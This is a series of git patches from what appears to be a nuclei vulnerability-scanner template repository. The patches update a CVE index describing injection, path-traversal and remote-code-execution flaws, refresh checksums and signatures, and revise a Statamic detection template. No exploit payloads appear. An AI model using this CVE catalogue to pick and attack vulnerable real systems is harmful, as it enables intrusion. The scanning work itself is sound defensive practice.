functionality of the file /assets/php/upload.php of the component Services Configuration. The manipulation of the argument fileToUpload leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251539. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2024/CVE-2024-0713.yaml"} +{"ID":"CVE-2024-0881","Info":{"Name":"Combo Blocks \u003c 2.2.76 - Improper Access Control","Severity":"medium","Description":"The Post Grid, Form Maker, Popup Maker, WooCommerce Blocks, Post Blocks, Post Carousel WordPress plugin before 2.2.76 does not prevent password protected posts from being displayed in the result of some unauthenticated AJAX actions, allowing unauthenticated users to read such posts\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-0881.yaml"} {"ID":"CVE-2024-1021","Info":{"Name":"Rebuild \u003c= 3.5.5 - Server-Side Request Forgery","Severity":"critical","Description":"There is a security vulnerability in Rebuild 3.5.5, which is due to a server-side request forgery vulnerability in the URL parameter of the readRawText function of the HTTP Request Handler component.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-1021.yaml"} {"ID":"CVE-2024-1061","Info":{"Name":"WordPress HTML5 Video Player - SQL Injection","Severity":"critical","Description":"WordPress HTML5 Video Player plugin is vulnerable to SQL injection. An unauthenticated attacker can exploit this vulnerability to perform SQL injection attacks.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-1061.yaml"} {"ID":"CVE-2024-1071","Info":{"Name":"WordPress Ultimate Member 2.1.3 - 2.8.2 – SQL Injection","Severity":"critical","Description":"The Ultimate Member - User Profile, Registration, Login, Member Directory, Content Restriction \u0026 Membership Plugin plugin for WordPress is vulnerable to SQL Injection via the ‘sorting’ parameter in versions 2.1.3 to 2.8.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-1071.yaml"} @@ -2377,9 +2382,16 @@ {"ID":"CVE-2024-29269","Info":{"Name":"Telesquare TLR-2005KSH - Remote Command Execution","Severity":"critical","Description":"Telesquare Tlr-2005Ksh is a Sk Telecom Lte router from South Korea's Telesquare company.Telesquare TLR-2005Ksh versions 1.0.0 and 1.1.4 have an unauthorized remote command execution vulnerability. An attacker can exploit this vulnerability to execute system commands without authorization through the Cmd parameter and obtain server permissions.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-29269.yaml"} {"ID":"CVE-2024-3136","Info":{"Name":"MasterStudy LMS \u003c= 3.3.3 - Unauthenticated Local File Inclusion via template","Severity":"critical","Description":"The MasterStudy LMS plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 3.3.3 via the 'template' parameter. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \"safe\" file types can be uploaded and included.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-3136.yaml"} {"ID":"CVE-2024-31621","Info":{"Name":"Flowise 1.6.5 - Authentication Bypass","Severity":"high","Description":"The flowise version \u003c= 1.6.5 is vulnerable to authentication bypass vulnerability.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-31621.yaml"} -{"ID":"CVE-2024-31849","Info":{"Name":"CData API Server \u003c 23.4.8844 - Path Traversal","Severity":"critical","Description":"A path traversal vulnerability exists in the Java version of CData API Server \u003c 23.4.8844 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain complete administrative access to the application.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-31849.yaml"} +{"ID":"CVE-2024-31848","Info":{"Name":"CData API Server \u003c 23.4.8844 - Path Traversal","Severity":"critical","Description":"A path traversal vulnerability exists in the Java version of CData API Server \u003c 23.4.8844 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain complete administrative access to the application.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-31848.yaml"} +{"ID":"CVE-2024-31849","Info":{"Name":"CData Connect \u003c 23.4.8846 - Path Traversal","Severity":"critical","Description":"A path traversal vulnerability exists in the Java version of CData Connect \u003c 23.4.8846 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain complete administrative access to the application.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-31849.yaml"} +{"ID":"CVE-2024-31850","Info":{"Name":"CData Arc \u003c 23.4.8839 - Path Traversal","Severity":"high","Description":"A path traversal vulnerability exists in the Java version of CData Arc \u003c 23.4.8839 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain access to sensitive information and perform limited actions.\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2024/CVE-2024-31850.yaml"} +{"ID":"CVE-2024-31851","Info":{"Name":"CData Sync \u003c 23.4.8843 - Path Traversal","Severity":"high","Description":"A path traversal vulnerability exists in the Java version of CData Sync \u003c 23.4.8843 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain access to sensitive information and perform limited actions.\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2024/CVE-2024-31851.yaml"} {"ID":"CVE-2024-32399","Info":{"Name":"RaidenMAILD Mail Server v.4.9.4 - Path Traversal","Severity":"high","Description":"Directory Traversal vulnerability in RaidenMAILD Mail Server v.4.9.4 and before allows a remote attacker to obtain sensitive information via the /webeditor/ component.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-32399.yaml"} +{"ID":"CVE-2024-32640","Info":{"Name":"Mura/Masa CMS - SQL Injection","Severity":"critical","Description":"The Mura/Masa CMS is vulnerable to SQL Injection.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-32640.yaml"} +{"ID":"CVE-2024-32651","Info":{"Name":"Change Detection - Server Side Template Injection","Severity":"critical","Description":"A Server Side Template Injection in changedetection.io caused by usage of unsafe functions of Jinja2 allows Remote Command Execution on the server host.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-32651.yaml"} {"ID":"CVE-2024-3273","Info":{"Name":"D-Link Network Attached Storage - Command Injection and Backdoor Account","Severity":"high","Description":"UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, was found in D-Link DNS-320L, DNS-325, DNS-327L and DNS-340L up to 20240403. Affected is an unknown function of the file /cgi-bin/nas_sharing.cgi of the component HTTP GET Request Handler. The manipulation of the argument system leads to command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259284. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.\n","Classification":{"CVSSScore":"7.3"}},"file_path":"http/cves/2024/CVE-2024-3273.yaml"} +{"ID":"CVE-2024-33575","Info":{"Name":"User Meta WP Plugin \u003c 3.1 - Sensitive Information Exposure","Severity":"medium","Description":"The User Meta is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.0 via the /views/debug.php file. This makes it possible for unauthenticated attackers, with to extract sensitive configuration data.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-33575.yaml"} +{"ID":"CVE-2024-33724","Info":{"Name":"SOPlanning 1.52.00 Cross Site Scripting","Severity":"medium","Description":"SOPlanning v1.52.00 is vulnerable to XSS via the 'groupe_id' parameters a remote unautheticated attacker can hijack the admin account or other users. The remote attacker can hijack a users session or credentials and perform a takeover of the entire platform.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-33724.yaml"} {"ID":"CVE-2024-3400","Info":{"Name":"GlobalProtect - OS Command Injection","Severity":"critical","Description":"A command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-3400.yaml"} {"ID":"CVE-2024-4040","Info":{"Name":"CrushFTP VFS - Sandbox Escape LFR","Severity":"critical","Description":"VFS Sandbox Escape in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows remote attackers with low privileges to read files from the filesystem outside of VFS Sandbox.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-4040.yaml"} {"ID":"CVE-2024-4348","Info":{"Name":"osCommerce v4.0 - Cross-site Scripting","Severity":"medium","Description":"A vulnerability, which was classified as problematic, was found in osCommerce 4. Affected is an unknown function of the file /catalog/all-products. The manipulation of the argument cat leads to cross site scripting. It is possible to launch the attack remotely.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2024/CVE-2024-4348.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index 9332b13391..47012701c5 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -56b04172c1df6906eb35bc5859e652a2 +235e457ee422c2956ae8e7b3cc7ca1d6 From 76a885b28ce3e5b57f24e6dc01ed621fa54e7c3d Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Sun, 12 May 2024 08:07:29 +0000 Subject: [PATCH 111/375] Auto Generated New Template Addition List [Sun May 12 08:07:29 UTC 2024] :robot: --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index 4921ec9466..e7b8a24d15 100644 --- a/.new-additions +++ b/.new-additions @@ -1,5 +1,7 @@ +http/cves/2023/CVE-2023-43374.yaml http/cves/2024/CVE-2024-0200.yaml http/exposed-panels/craftercms-panel.yaml +http/exposed-panels/unleash-panel.yaml http/misconfiguration/installer/moosocial-installer.yaml http/misconfiguration/installer/phpmyfaq-installer.yaml http/technologies/craftercms-detect.yaml From cc6931ae66aff704f26c8efd01e81b4075f5c4c2 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sun, 12 May 2024 08:07:35 +0000 Subject: [PATCH 112/375] Auto Generated Templates Checksum [Sun May 12 08:07:35 UTC 2024] :robot: --- templates-checksum.txt | 13 +++++++------ 1 file changed, 7 insertions(+), 6 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 426cc491fb..100d4525f4 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -187,8 +187,8 @@ code/privilege-escalation/linux/rw-sudoers.yaml:f974b1d1a68fd7a8cd24b6f1b61855dd code/privilege-escalation/linux/sudo-nopasswd.yaml:3117c141f35b9229b6ebe1db10a4fef77aa6ee17 code/privilege-escalation/linux/writable-etc-passwd.yaml:c0ad4796f42aab9c901b52b52b91940172d070e9 contributors.json:951e2ab8bbae42da01f52da9ef0a14ce7f17e159 -cves.json:0820bc134ca52d7071cc8c6596b3ac37a095a0ae -cves.json-checksum.txt:996eafaef74b06977788950a04aeebf48b096611 +cves.json:0058f7deab6259dbd38b4404ee74975e45bc4f75 +cves.json-checksum.txt:c9eed153337837c2ce6b2ce89bb9bd59d39758a9 dast/cves/2018/CVE-2018-19518.yaml:06ecee25413d9f238e2ae0138b4775f0243e8d22 dast/cves/2021/CVE-2021-45046.yaml:d470397419ae4ef5db02b0a833013fe295576396 dast/cves/2022/CVE-2022-34265.yaml:e006df0567f928e43d40050f55d5928a3fbff17e @@ -217,7 +217,7 @@ dns/detect-dangling-cname.yaml:0c5204f22465c8ebb8ae31e6265ffa5c0cd4b6e2 dns/dmarc-detect.yaml:d60f87ac8a617c0496d558269abd50389bbb1b37 dns/dns-rebinding.yaml:45774e6d0aabacb2fcf032dc41deb3073c8abba6 dns/dns-saas-service-detection.yaml:d43ab2edca6bc38254ad1f4c4889e5cece34691e -dns/dns-waf-detect.yaml:7f32662209d10627c60fca75caa4e03799703113 +dns/dns-waf-detect.yaml:305812728bc0395016f22f5b4c04f634a9fb4ad4 dns/dnssec-detection.yaml:ce828fea84336b2c79b18479063e1e1aaf083592 dns/ec2-detection.yaml:689933e484835fda36da5f3402df123405cc8644 dns/elasticbeanstalk-takeover.yaml:d6be1fd0a3ee4d72149e942bcf77b93c175c1588 @@ -3694,7 +3694,7 @@ http/exposed-panels/couchdb-exposure.yaml:ff98d142744ff74de39b724b5733b9584e3969 http/exposed-panels/couchdb-fauxton.yaml:b0447223641003425221f1a22f1809b82bc64558 http/exposed-panels/cpanel-api-codes.yaml:a26ac3c4c4cb3e32b40376f94d2d4cd90387ead7 http/exposed-panels/craftcms-admin-panel.yaml:ad84bef6e6da1edf763aad80aaa6de3a91d2f395 -http/exposed-panels/craftercms-panel.yaml:549ab470d58023ba1996a92b5918a532bb472c8b +http/exposed-panels/craftercms-panel.yaml:7746ab0c30459db7e6f5bf023bf55ec47a7eeb90 http/exposed-panels/creatio-login-panel.yaml:be251ed8449b36fffd157869473e9d02d523f573 http/exposed-panels/crontab-ui.yaml:7504a353c3dc9824fefa0aae8181f1d1432e8ed9 http/exposed-panels/crush-ftp-login.yaml:fd6d8e7854c0b21aefe3ccd2c888a28e5605a996 @@ -4448,6 +4448,7 @@ http/exposed-panels/unauth-xproxy-dashboard.yaml:c01ec537b431a19a6379b6616d1656c http/exposed-panels/unauthenticated-frp.yaml:7dce249491443ca0f4d7954e2a0fed07a90418d6 http/exposed-panels/unibox-panel.yaml:cdf9eb8ff2bb47a65d41b11e01c20e80e129fc42 http/exposed-panels/unifi-panel.yaml:7453d0729a5fd66914347f5ee4a41a958b05cd1e +http/exposed-panels/unleash-panel.yaml:55fc803c4901e3ece2d6d0ff3a273dbb403b7f52 http/exposed-panels/untangle-admin-login.yaml:e608572d5f228bc2af5c784d0944ec5cd7e6174b http/exposed-panels/uptime-kuma-panel.yaml:422d9cf4aa37790f9729c374453d9a4c7a3cfa88 http/exposed-panels/urbackup-panel.yaml:907afaf682a672c3770668b8c640cbf7bb233d8a @@ -5404,7 +5405,7 @@ http/misconfiguration/installer/mcloud-installer.yaml:833e2575e02b6336777860b535 http/misconfiguration/installer/metaview-explorer-installer.yaml:1b9dce3e9610d021aa211b44ed5397207c241be9 http/misconfiguration/installer/monstra-installer.yaml:bcc03eec7693c2c9e5c960958ab70b00bcea40bf http/misconfiguration/installer/moodle-installer.yaml:79053437435e1590bb58eb747a87109c8c5d026b -http/misconfiguration/installer/moosocial-installer.yaml:02d115a28e24b592b0088b1c0a286c7b2f26161b +http/misconfiguration/installer/moosocial-installer.yaml:fcb42a5d3af9d846ec71cc165bde4962bb381c71 http/misconfiguration/installer/mosparo-install.yaml:0b6f15dce7c5579e4e7a2db365050972b8be308a http/misconfiguration/installer/nagiosxi-installer.yaml:3dbd7b4606de96c3d2ef86245924586928ade5c9 http/misconfiguration/installer/netsparker-enterprise-installer.yaml:87452a1aa538401b678c40487818511b300f67d2 @@ -8506,7 +8507,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:5c371db8064ff0116c0cf564c176e0dd4288a057 +templates-checksum.txt:884344860c187a106c81b270a24e6a1e612a56b7 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 89ffcb57bff412e272d7dc1bbd7550454a0ad76b Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Sun, 12 May 2024 13:37:48 +0530 Subject: [PATCH 113/375] Update and rename unigui-server-monitor-exposure.yaml to http/misconfiguration/unigui-server-monitor-exposure.yaml --- .../misconfiguration/unigui-server-monitor-exposure.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename unigui-server-monitor-exposure.yaml => http/misconfiguration/unigui-server-monitor-exposure.yaml (100%) diff --git a/unigui-server-monitor-exposure.yaml b/http/misconfiguration/unigui-server-monitor-exposure.yaml similarity index 100% rename from unigui-server-monitor-exposure.yaml rename to http/misconfiguration/unigui-server-monitor-exposure.yaml From 8fc2e6db52c954d9f4341264537e35ea8991e4bd Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Sun, 12 May 2024 08:08:17 +0000 Subject: [PATCH 114/375] Syncing Templates --- .github/workflows/templates-sync.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index c1db7f4338..6194f47444 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -3,8 +3,10 @@ on: push: paths: - '.new-additions' + - 'http/cves/2023/CVE-2023-43374.yaml' - 'http/cves/2024/CVE-2024-0200.yaml' - 'http/exposed-panels/craftercms-panel.yaml' + - 'http/exposed-panels/unleash-panel.yaml' - 'http/misconfiguration/installer/moosocial-installer.yaml' - 'http/misconfiguration/installer/phpmyfaq-installer.yaml' - 'http/technologies/craftercms-detect.yaml' From ed6d05149481fba6147ab9aea9a8bf732baf86f4 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sun, 12 May 2024 08:09:26 +0000 Subject: [PATCH 115/375] Auto Template Signing [Sun May 12 08:09:26 UTC 2024] :robot: --- http/cves/2023/CVE-2023-43374.yaml | 1 + http/exposed-panels/unleash-panel.yaml | 1 + http/technologies/tinyproxy-detect.yaml | 1 + 3 files changed, 3 insertions(+) diff --git a/http/cves/2023/CVE-2023-43374.yaml b/http/cves/2023/CVE-2023-43374.yaml index 65b4325ac3..1b20ba9e04 100644 --- a/http/cves/2023/CVE-2023-43374.yaml +++ b/http/cves/2023/CVE-2023-43374.yaml @@ -61,3 +61,4 @@ http: - 'status_code == 200' - 'contains(body, "HotelDruid:")' condition: and +# digest: 4a0a00473045022100e833bee8477a7d35d428595751237754df5f6dcd346f312d7bd3b39aff1ce502022073b0e42e337aadd7c1cd77196e08e3ecada460c031dca3ecfd850b727521655f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/unleash-panel.yaml b/http/exposed-panels/unleash-panel.yaml index c3378ef0b9..1aa5ff3ef6 100644 --- a/http/exposed-panels/unleash-panel.yaml +++ b/http/exposed-panels/unleash-panel.yaml @@ -37,3 +37,4 @@ http: - type: dsl dsl: - "status_code==200 && (\"-608690655\" == mmh3(base64_py(body)))" +# digest: 490a00463044022014fd08bb5e7f980ecf35eb263ef728dff1b0b8ca20cfee86410abeb3f180c9c5022036ad4163750eaee7d3271a6ccc3f10245b3d4aa1a16be7f68e9eb6e04b2e54c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/tinyproxy-detect.yaml b/http/technologies/tinyproxy-detect.yaml index e571cd5694..a0cb2d92c8 100644 --- a/http/technologies/tinyproxy-detect.yaml +++ b/http/technologies/tinyproxy-detect.yaml @@ -30,3 +30,4 @@ http: - type: kval kval: - server +# digest: 4b0a004830460221008ec97763de41920c6428a4b0e039d72a2a87b2e8d2fd891cfa7a70b0bd2c7ddc022100a1fbedfc84f6e0aaf4233a640e2589dfc2341243472f7125eb47bc15a3917e65:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 937c9fda616508bc55b0e3353f38c8d948d70114 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Sun, 12 May 2024 08:12:23 +0000 Subject: [PATCH 116/375] Auto Generated New Template Addition List [Sun May 12 08:12:23 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index e7b8a24d15..2d8595fdb8 100644 --- a/.new-additions +++ b/.new-additions @@ -4,5 +4,6 @@ http/exposed-panels/craftercms-panel.yaml http/exposed-panels/unleash-panel.yaml http/misconfiguration/installer/moosocial-installer.yaml http/misconfiguration/installer/phpmyfaq-installer.yaml +http/misconfiguration/unigui-server-monitor-exposure.yaml http/technologies/craftercms-detect.yaml http/technologies/tinyproxy-detect.yaml From 452d3efb238479933bc2b9c603dfd417ac14b08c Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sun, 12 May 2024 08:12:29 +0000 Subject: [PATCH 117/375] Auto Generated Templates Checksum [Sun May 12 08:12:29 UTC 2024] :robot: --- templates-checksum.txt | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 100d4525f4..c6e2834914 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3155,7 +3155,7 @@ http/cves/2023/CVE-2023-43208.yaml:fe7941493bcf8b59fd55d2e57288bbb985cf2d65 http/cves/2023/CVE-2023-43261.yaml:4e229f26b444802b453164764a7f455c69bbcb56 http/cves/2023/CVE-2023-43325.yaml:7849edeca0eb8481c4a3aed6c3589196b6cef4a6 http/cves/2023/CVE-2023-43326.yaml:57d65b95951cc3b5e326ad3790f27d15e83d3a4d -http/cves/2023/CVE-2023-43374.yaml:4f7f62c35a898225da4c40a9b44f77de5b0f84e9 +http/cves/2023/CVE-2023-43374.yaml:cf29b56d8ba36ab18d35d83a0105cbe76841ec1f http/cves/2023/CVE-2023-43795.yaml:a14750da396529474d303182bee73893d7f284c9 http/cves/2023/CVE-2023-4415.yaml:21b79187558e4d88b2c453cfe6c99cc13c84fccb http/cves/2023/CVE-2023-44352.yaml:838f6b730d02b9335f6e41cfa6f1e28ab7c3828e @@ -4448,7 +4448,7 @@ http/exposed-panels/unauth-xproxy-dashboard.yaml:c01ec537b431a19a6379b6616d1656c http/exposed-panels/unauthenticated-frp.yaml:7dce249491443ca0f4d7954e2a0fed07a90418d6 http/exposed-panels/unibox-panel.yaml:cdf9eb8ff2bb47a65d41b11e01c20e80e129fc42 http/exposed-panels/unifi-panel.yaml:7453d0729a5fd66914347f5ee4a41a958b05cd1e -http/exposed-panels/unleash-panel.yaml:55fc803c4901e3ece2d6d0ff3a273dbb403b7f52 +http/exposed-panels/unleash-panel.yaml:be51937dd1d4f1ac7feadf1883b3026016d08f53 http/exposed-panels/untangle-admin-login.yaml:e608572d5f228bc2af5c784d0944ec5cd7e6174b http/exposed-panels/uptime-kuma-panel.yaml:422d9cf4aa37790f9729c374453d9a4c7a3cfa88 http/exposed-panels/urbackup-panel.yaml:907afaf682a672c3770668b8c640cbf7bb233d8a @@ -5699,6 +5699,7 @@ http/misconfiguration/unauthenticated-zipkin.yaml:73f69a3db4803b395469ae1d03d6a8 http/misconfiguration/unauthorized-h3csecparh-login.yaml:52ba2425210b300862c20a149417b849615ac9e0 http/misconfiguration/unauthorized-plastic-scm.yaml:f0b988e5aa54ff9c9d233a6a15796cfdb4270569 http/misconfiguration/unauthorized-puppet-node-manager-detect.yaml:eb1d62caa10228fd5847ef05c1ba56eef9756320 +http/misconfiguration/unigui-server-monitor-exposure.yaml:5a8953fafae644cf0bbdc56331df911747272ecf http/misconfiguration/untangle-admin-setup.yaml:48ca3177690a4ffd930faf99a443caade96231c7 http/misconfiguration/ups-status.yaml:e72e5c146b99b7efed8a61faf81517cc5f9e9736 http/misconfiguration/v2x-control.yaml:1e5196bc738b2850f7c29df0a9af5e933fde4e7f @@ -6927,7 +6928,7 @@ http/technologies/thinkphp-detect.yaml:4f4c4b8bb5ea605c7dd26335d710811935db624d http/technologies/tibco-businessconnect-detect.yaml:df1e040bbfa4c989246929173292176c9f5e3137 http/technologies/tibco-spotfire-services-detect.yaml:26a79d78f2c140283420e74921930270ad17851a http/technologies/tileserver-gl.yaml:27fe637c0f3de39676585f41d5980e246441bdab -http/technologies/tinyproxy-detect.yaml:ec51387f8f975ce3da63f0a9a675e9a6d7396c92 +http/technologies/tinyproxy-detect.yaml:1f12faf3ae2dd38f5c8f0aed9753d65ce611b795 http/technologies/tor-socks-proxy.yaml:ad664f3598d1039dd335f4128e1cb81ceeef4864 http/technologies/tornado-server-login.yaml:7d8148d6ca18ef79abc33aceacbf8dbafd31d4d4 http/technologies/typo3-detect.yaml:206df0bc720861958780557535b8b4693ec64636 @@ -8507,7 +8508,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:884344860c187a106c81b270a24e6a1e612a56b7 +templates-checksum.txt:8236c7940702769898d0b91e1e5ce69744a9d159 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 66fb30a1bfeb495d4b94044c428b213415f13150 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Sun, 12 May 2024 08:13:10 +0000 Subject: [PATCH 118/375] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 6194f47444..db0d204223 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -9,6 +9,7 @@ on: - 'http/exposed-panels/unleash-panel.yaml' - 'http/misconfiguration/installer/moosocial-installer.yaml' - 'http/misconfiguration/installer/phpmyfaq-installer.yaml' + - 'http/misconfiguration/unigui-server-monitor-exposure.yaml' - 'http/technologies/craftercms-detect.yaml' - 'http/technologies/tinyproxy-detect.yaml' workflow_dispatch: From 22ea10d5a95d339c499ed989d3e59363e22f8377 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sun, 12 May 2024 08:14:08 +0000 Subject: [PATCH 119/375] Auto Template Signing [Sun May 12 08:14:08 UTC 2024] :robot: --- http/misconfiguration/unigui-server-monitor-exposure.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/misconfiguration/unigui-server-monitor-exposure.yaml b/http/misconfiguration/unigui-server-monitor-exposure.yaml index 922ef2f2aa..ff0d6eee1f 100644 --- a/http/misconfiguration/unigui-server-monitor-exposure.yaml +++ b/http/misconfiguration/unigui-server-monitor-exposure.yaml @@ -33,3 +33,4 @@ http: - 'contains(body, "layout:\"fit\",title:\"uniGUI Standalone Server\"")' - 'contains(body, "layout:\"absolute\",title:\"Server Statistics\"")' condition: or +# digest: 490a0046304402205766cced7933a5f2f8ba6e4cd966dad51910774c86ee9260bb819ad300d147570220621881cf5155550a9207b7e19241b39c6a0df15d8629dac7675d024c80d6f14c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From aafbf077f8fa0f7ae96f1fdbfb2c74a3f410a0f0 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sun, 12 May 2024 13:46:56 +0530 Subject: [PATCH 120/375] updated matcher & info --- http/technologies/statamic-detect.yaml | 22 +++++++++++++++------- 1 file changed, 15 insertions(+), 7 deletions(-) diff --git a/http/technologies/statamic-detect.yaml b/http/technologies/statamic-detect.yaml index 9b5d841b29..fe4003d1d6 100644 --- a/http/technologies/statamic-detect.yaml +++ b/http/technologies/statamic-detect.yaml @@ -1,20 +1,28 @@ id: statamic-detect info: - name: Statamic Detection - description: Statamic is the flat-first, Laravel + Git powered CMS designed for building beautiful, easy to manage websites. - reference: https://github.com/statamic/cms + name: Statamic - Detect author: geeknik severity: info - tags: tech,statamic + description: | + Statamic is the flat-first, Laravel + Git powered CMS designed for building beautiful, easy to manage websites. + reference: + - https://github.com/statamic/cms + metadata: + verified: true + max-request: 1 + shodan-query: "Statamic" + tags: tech,statamic,detect http: - method: GET path: - "{{BaseURL}}" + host-redirects: true + max-redirects: 2 matchers: - - type: word + - type: regex part: header - words: - - 'X-Powered-By: Statamic' + regex: + - 'X-Powered-By:(.*)Statamic' From c6f19fd2af9eed892f538216c91af071ddd9d11b Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sun, 12 May 2024 09:48:41 +0000 Subject: [PATCH 121/375] Auto Generated Templates Checksum [Sun May 12 09:48:41 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index c6e2834914..8ddf9e1922 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -5699,7 +5699,7 @@ http/misconfiguration/unauthenticated-zipkin.yaml:73f69a3db4803b395469ae1d03d6a8 http/misconfiguration/unauthorized-h3csecparh-login.yaml:52ba2425210b300862c20a149417b849615ac9e0 http/misconfiguration/unauthorized-plastic-scm.yaml:f0b988e5aa54ff9c9d233a6a15796cfdb4270569 http/misconfiguration/unauthorized-puppet-node-manager-detect.yaml:eb1d62caa10228fd5847ef05c1ba56eef9756320 -http/misconfiguration/unigui-server-monitor-exposure.yaml:5a8953fafae644cf0bbdc56331df911747272ecf +http/misconfiguration/unigui-server-monitor-exposure.yaml:e3a54c9004bcf6d77aa157f31df9d027ed46c812 